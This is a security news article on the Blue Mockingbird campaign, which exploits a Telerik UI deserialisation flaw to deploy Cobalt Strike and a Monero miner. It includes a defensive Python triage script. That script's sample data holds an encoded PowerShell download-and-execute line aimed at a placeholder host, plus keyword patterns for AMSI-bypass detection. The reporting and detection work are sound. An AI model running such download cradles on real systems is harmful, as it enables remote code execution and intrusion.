‘Blue Mockingbird’, a threat actor, targets Telerik UI vulnerabilities to compromise servers, install Cobalt Strike beacons, and mine Monero by hijacking system resources.
The attacker leverages CVE-2019-18935, a critical-severity (CVSS v3.1: 9.8) deserialisation flaw that leads to remote code execution in the Telerik UI library for ASP.NET AJAX.
In May 2020, the same threat actor was observed targeting vulnerable Microsoft IIS Servers that used Telerik UI.
Sophos researchers reported this week that, according to their detection data, Blue Mockingbird is still using the same flaw to launch cyberattacks.
To exploit CVE-2019-18935, the attackers require the encryption keys that protect Telerik UI’s serialisation on the target. This information can be obtained by using CVE-2017-11317 and CVE-2017-11357 or by exploiting another vulnerability in the target web app.
Many web apps were projects that embedded the Telerik UI framework version available at the time of development and were then forgotten about or discontinued. This means that there are still valid targets available for exploitation.
Once the keys are acquired, the attackers can compile a malicious DLL containing the code to be executed during deserialisation and run it within the context of the ‘w3wp.exe’ process.
Sophos spotted that Blue Mockingbird employs a readily available proof-of-concept (PoC) exploit, which automates the DLL compilation and handles the encryption logic.
The payload used in the recent attacks is a Cobalt Strike beacon, a legitimate penetration testing tool that Blue Mockingbird abuses to execute encoded PowerShell commands.
Persistence is established via Active Directory Group Policy Objects (GPOs), which create scheduled tasks written to a new registry key containing base64-encoded PowerShell.
To evade Windows Defender while downloading and loading a Cobalt Strike DLL into memory, the script uses common AMSI-bypass techniques.
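The two behaviours described above, PowerShell launched from the IIS worker process ‘w3wp.exe’ and base64-encoded PowerShell used for persistence, are what a defender would look for in process-creation telemetry. The following is an added triage example written for this article, not Sophos's or the threat actor's code; the events and encoded commands are constructed samples, and the field names assume a simplified Sysmon-style process-creation record.

```python
import base64
import re

def encode_ps(cmd: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

# Constructed sample events (not real telemetry): one IIS-spawned stager,
# one benign script run, one encoded but harmless task-launched command.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -w hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient)"
                            ".DownloadString('http://example.invalid/stage')")},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -EncodedCommand " + encode_ps("Get-Date")},
]

# Matches the short and long spellings PowerShell accepts for -EncodedCommand.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS_RE = re.compile(r"downloadstring|iex|amsiutils|amsiinitfailed", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event: dict) -> list:
    """Collect findings for one process-creation event; empty list means nothing notable."""
    findings = []
    if event["parent"].lower().endswith("\\w3wp.exe"):
        findings.append("PowerShell spawned by IIS worker process w3wp.exe")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded PowerShell: " + decoded)
        if SUSPICIOUS_RE.search(decoded):
            findings.append("download or AMSI-bypass indicator in decoded command")
    return findings

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent"], "->", triage(ev))
```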
The second-stage executable (‘crby26td.exe’) is an XMRig Miner, a standard open-source cryptocurrency miner used for mining Monero. Monero is one of the least traceable crypto coins.
This was the threat actor’s main goal in their 2020 campaign.
The deployment of Cobalt Strike opens the way to easy lateral movement within the compromised network, account takeover, data exfiltration, and deployment of more potent payloads.